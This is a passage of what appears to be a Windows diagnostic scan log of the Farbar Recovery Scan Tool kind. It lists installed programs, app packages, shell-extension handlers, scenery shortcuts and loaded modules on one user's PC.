Krzysztof Kowalczyk) TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer) teVirtualMIDI64 (HKLM\...\{9084640A-366B-4C44-BDB1-74864B460B13}) (Version: 1.2.10.38 - Tobias Erichsen) Hidden thinkorswim (HKLM\...\9968-4488-2169-7623) (Version: desktop - thinkorswim, Inc) Traffic Simulator Configuration Tool (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Traffic Simulator Configuration Tool) (Version: - ) TypeScript SDK (HKLM-x32\...\{3CBDDAE8-99AE-4168-BDA7-8352BF15BE73}) (Version: 3.1.2.0 - Microsoft Corporation) Hidden TypeScript SDK (HKLM-x32\...\{CFA1F87E-EF2B-4785-812C-4BEEA22CFD06}) (Version: 2.3.5.0 - Microsoft Corporation) Hidden UltraSearch V2.3 (64 bit) (HKLM\...\UltraSearch_is1) (Version: 2.3 - JAM Software) Unity (HKLM-x32\...\Unity) (Version: 5.6.3p1 - Unity Technologies ApS) Universal CRT Extension SDK (HKLM-x32\...\{1FBCBC17-4527-2340-0832-B1D49C41FF67}) (Version: 10.0.26624 - Microsoft Corporation) Hidden Universal CRT Extension SDK (HKLM-x32\...\{7D225043-6CC5-7B56-11DD-AFF90E4C1C0C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden Universal CRT Extension SDK (HKLM-x32\...\{BE2D1829-B45D-4D78-BF02-4076B86AC57C}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden Universal CRT Headers Libraries and Sources (HKLM-x32\...\{8BFBEC30-33CC-13B4-849F-3B036F27466A}) (Version: 10.0.26624 - Microsoft Corporation) Hidden Universal CRT Headers Libraries and Sources (HKLM-x32\...\{A46D1F7A-BA32-2375-EF97-4975E594A7E7}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden Universal CRT Headers Libraries and Sources (HKLM-x32\...\{CB19DBA2-C210-5646-9522-695A1317CD34}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden Universal CRT Redistributable (HKLM-x32\...\{413A1F9C-9349-4847-610E-BAB177A48ADE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden Universal CRT Redistributable (HKLM-x32\...\{5F577A45-3C65-352B-061D-D6A57F05402C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden Universal CRT Tools x64 (HKLM\...\{3B588BBE-EB02-D1B2-5CD5-7DB85AD8A3E7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden Universal CRT Tools x86 (HKLM-x32\...\{D2DC1EDF-EE04-9B5F-BDD7-06645D859EC3}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden Universal General MIDI DLS Extension SDK (HKLM-x32\...\{CE83D0BD-418A-F3D1-D6CE-687E96D1EBD0}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden Universal General MIDI DLS Extension SDK (HKLM-x32\...\{E2EA2702-534B-D6C1-5AC4-724E3CE7B2D9}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden Universal Patch Finder version 1.5 (HKLM-x32\...\{88FBB3D2-C9A5-41E4-88B8-3F4F1722E7D1}_is1) (Version: 1.5 - Hypercube Softwares) Update for (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation) Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9C4F3AF4-21D8-43BD-A69C-517BB96012CF}) (Version: 2.12.0.0 - Microsoft Corporation) UpdateAssistant (HKLM-x32\...\{B302EECB-0DA5-46E6-8A58-127440F22CF1}) (Version: 1.7.0.0 - Microsoft Corporation) Hidden VBSBeautifier (remove only) (HKLM-x32\...\VBSBeautifier) (Version: - ) vcpp_crt.redist.clickonce (HKLM-x32\...\{253D6AD3-5786-4B3B-B4E1-E082482A1F26}) (Version: 14.16.27033 - Microsoft Corporation) Hidden VeraCrypt (HKLM-x32\...\VeraCrypt) (Version: 1.21 - IDRIX) Viber (HKLM-x32\...\{32AF88A9-E104-4306-8B68-CB92FFD2CAD6}) (Version: 11.0.0.42 - Viber Media S.a.r.l) Hidden Viber (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\{9097b5b3-1f2b-4ff7-a350-97a76bb76fb8}) (Version: 11.0.0.42 - Viber Media S.a.r.l) Visual Studio Community 2017 (HKLM-x32\...\fba7c5bd) (Version: 15.9.28307.905 - Microsoft Corporation) VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN) VoiceBot 3.0 (HKLM-x32\...\2BB5202A-885B-454F-8624-FD3310CD3225_is1) (Version: 3.0.0.0 - Binary Fortress Software) VS Immersive Activate Helper (HKLM-x32\...\{54FBC9A9-CCA1-417E-ACA6-203A32A39F37}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden VS JIT Debugger (HKLM\...\{4B816AD0-D12B-498A-8148-7CBE3ED328DE}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden vs_BlendMsi (HKLM-x32\...\{C5D83E0F-12E7-4BA3-98E6-DAE0E73B5BF9}) (Version: 15.0.27205 - Microsoft Corporation) Hidden vs_clickoncebootstrappermsi (HKLM-x32\...\{A68D7884-F036-4A0D-AE1A-410E0311E135}) (Version: 15.0.27005 - Microsoft Corporation) Hidden vs_clickoncebootstrappermsires (HKLM-x32\...\{91DDDFB5-1782-48C2-BA2A-8F4D9DE39D27}) (Version: 15.0.27005 - Microsoft Corporation) Hidden vs_clickoncesigntoolmsi (HKLM-x32\...\{6A1ECF65-2CBF-4B33-9D4A-D1C0A0E5FE45}) (Version: 15.0.27005 - Microsoft Corporation) Hidden vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden vs_communitymsires (HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden vs_Graphics_Singletonx64 (HKLM\...\{B6BAC9A6-A70D-4E4D-B90A-7EE2B336E090}) (Version: 15.8.27729 - Microsoft Corporation) Hidden vs_Graphics_Singletonx86 (HKLM-x32\...\{3161DA68-DD37-4798-82DB-B3A0BD6BA233}) (Version: 15.8.27729 - Microsoft Corporation) Hidden vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{5779B6DD-604A-41CE-BC3D-9D4BDDA22AD2}) (Version: 15.0.27005 - Microsoft Corporation) Hidden vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden Weka 3.8.3 (HKLM\...\Weka 3.8.3) (Version: 3.8.3 - Machine Learning Group, University of Waikato, Hamilton, NZ) WinAppDeploy (HKLM-x32\...\{03343DEA-224B-E9B6-1FBB-E637E6BC6BAA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinAppDeploy (HKLM-x32\...\{716AE8F2-1BE3-7657-DF6B-F23DEEC75AF9}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinAutomation (HKLM\...\{67F5E390-8E09-4AE4-B7F2-705AFD23D86D}) (Version: 6.0.2.4227 - Softomotive Ltd) Hidden WinAutomation (HKLM-x32\...\WinAutomation) (Version: 6.0.2.4227 - Softomotive Ltd) Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22211 - Microsoft Corporation) Windows SDK AddOn (HKLM-x32\...\{E1C6F438-7C50-41F5-8B47-3CC96D397CA3}) (Version: 10.1.0.0 - Microsoft Corporation) Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version: - ) Windows Software Development Kit - Windows 10.0.15063.674 (HKLM-x32\...\{6824cee4-b358-4633-b82c-5f20894af8e2}) (Version: 10.1.15063.674 - Microsoft Corporation) Windows Software Development Kit - Windows 10.0.17763.132 (HKLM-x32\...\{5fe95b9d-9219-4d8b-a031-71323ae48a81}) (Version: 10.1.17763.132 - Microsoft Corporation) WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH) WinRT Intellisense Desktop - en-us (HKLM-x32\...\{00B12DF9-5428-9406-DE2C-8E8A1A062B05}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense Desktop - en-us (HKLM-x32\...\{D8AA52A2-81E2-BB84-AAF9-C487C586CC15}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{5715A2A6-E637-81E3-464D-3F0F999E506A}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{E82A4A6C-C21C-35FE-B805-3E44318F6D63}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense IoT - en-us (HKLM-x32\...\{2B8614A6-D0C1-CFE0-9311-7AF9227DC9BA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense IoT - en-us (HKLM-x32\...\{7E898893-9C42-A572-7F57-FDE55CE812F7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{409D68FF-37DD-F8F4-A60F-30BEAA4AA4CE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E8B1CB29-5C24-D882-3CEF-F8A7263BC63D}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense Mobile - en-us (HKLM-x32\...\{F6F11150-93DE-0507-FCA0-F746E0207017}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense PPI - en-us (HKLM-x32\...\{3617F573-CF51-0F5A-063F-B272F98D0522}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense PPI - en-us (HKLM-x32\...\{8329C3A0-8582-D1C2-67FF-800654BFDF45}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{771C9DEF-7C0B-85DA-6426-7A20F06BEC94}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{FDE59EF8-D43D-F9DA-5B0C-CC9C90DB0335}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense UAP - en-us (HKLM-x32\...\{87CC4887-0873-F87B-D804-6A78B07DC1F5}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense UAP - en-us (HKLM-x32\...\{B047C746-63E8-41C7-A5C0-7ABD390CF3E6}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{0063AF94-397B-9C64-1C71-D404B27C5D96}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{D62E0DD5-9853-C09C-AE15-D02988503C60}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden wxWidgets 3.0.4 (HKLM-x32\...\wxWidgets_is1) (Version: - wxWidgets) X-Mouse Button Control 2.18.8 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.18.8 - Highresolution Enterprises) ZBrush 4R7 (HKLM-x32\...\ZBrush 4R7 4R7) (Version: 4R7 - Pixologic) Packages: ========= Mail and Calendar -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12228.20206.0_x64__8wekyb3d8bbwe [2019-11-20] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad] Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.33.13094.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation) [MS Ad] Microsoft Phone Companion -> C:\Program Files\WindowsApps\Microsoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe [2018-11-13] (Microsoft Corporation) Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.11052.0_x64__8wekyb3d8bbwe [2019-11-10] (Microsoft Studios) [MS Ad] MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad] MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad] MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.33.13253.0_x64__8wekyb3d8bbwe [2019-11-23] (Microsoft Corporation) [MS Ad] Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation) ==================== Custom CLSID (Whitelisted): ============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{23066764-9BDD-4FBD-8B1F-F4547CF2684F}\InprocServer32 -> C:\Users\SR\AppData\Local\Microsoft\OneDrive\18.070.0405.0002\amd64\FileSyncShell64.dll => No File CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{E31EA727-12ED-4702-820C-4B6445F28E1A} -> [Dropbox] => C:\Users\SR\Dropbox [2018-01-03 12:23] ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> ) ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> ) ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> ) ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> ) ContextMenuHandlers1: [AESCrypt] -> {35872D53-3BD4-45FA-8DB5-FFC47D4235E7} => C:\Program Files\AESCrypt\AESCrypt.dll [2015-04-17] (Packetizer, Inc.) [File not signed] ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-07-23] (Notepad++ -> ) ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed] ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL [2017-01-31] (pdfforge GmbH -> pdfforge GmbH) ContextMenuHandlers1: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed] ContextMenuHandlers2: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed] ContextMenuHandlers4: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes) ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => -> No File ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation) ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> ) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal) ==================== Codecs (Whitelisted) ==================== ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) Shortcut: C:\Users\SR\Desktop\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maxis\SimCity 4\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_AlpesNordBP.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_AlpesNordBP.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_SUMMER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_SUMMER.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_WINTER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_WINTER.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Summer.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_SummerBasePack.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Winter.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Summer.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_SummerBasePack.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Winter.bat () ==================== Loaded Modules (Whitelisted) ============= 2019-11-24 19:12 - 2008-10-15 16:44 - 000205312 _____ () [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\itdownload.dll 2019-11-24 19:12 - 2019-11-24 19:12 - 000903680 _____ () [File not signed] C:\Users\SR\AppData\Local\Temp\is-FML3U.tmp\Guitar.tmp 2009-02-23 12:28 - 2009-02-23 12:28 - 000013824 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctagent.DLL 2009-02-23 12:27 - 2009-02-23 12:27 - 000175104 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDCIFCE.DLL 2009-02-23 12:16 - 2009-02-23 12:16 - 000067584 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDPROXY.DLL 2009-02-23 12:28 - 2009-02-23 12:28 - 000061952 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctpcmcia.DLL 2009-02-23 12:28 - 2009-02-23 12:28 - 000046592 _____ (Creative Technology Ltd) [File not signed] 